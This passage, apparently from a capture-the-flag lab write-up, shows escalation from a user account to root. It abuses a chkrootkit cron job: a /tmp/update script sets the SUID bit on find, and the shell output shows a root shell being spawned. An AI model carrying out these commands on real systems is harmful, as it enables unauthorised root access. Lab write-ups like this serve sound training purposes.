5 privesc amrois > root
# pspy
every minute lots of activity, this is run many times
2021/09/29 19:44:04 CMD: UID=0 PID=2251 | /bin/sh /usr/bin/chkrootkit
Using https://www.exploit-db.com/exploits/33899
| Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.
amrois@nineveh:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 221768 Feb 7 2016 /usr/bin/find
amrois@nineveh:~$ cat << EOF > /tmp/update
> #!/bin/bash
>
> chmod +s /usr/bin/find;
> EOF
amrois@nineveh:~$ chmod +x /tmp/update
amrois@nineveh:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb 7 2016 /usr/bin/find
amrois@nineveh:~$ find . -exec /bin/bash -p \; -quit
bash-4.3# whoami;id
root
uid=1000(amrois) gid=1000(amrois) euid=0(root) egid=0(root) groups=0(root),1000(amrois)
Last updated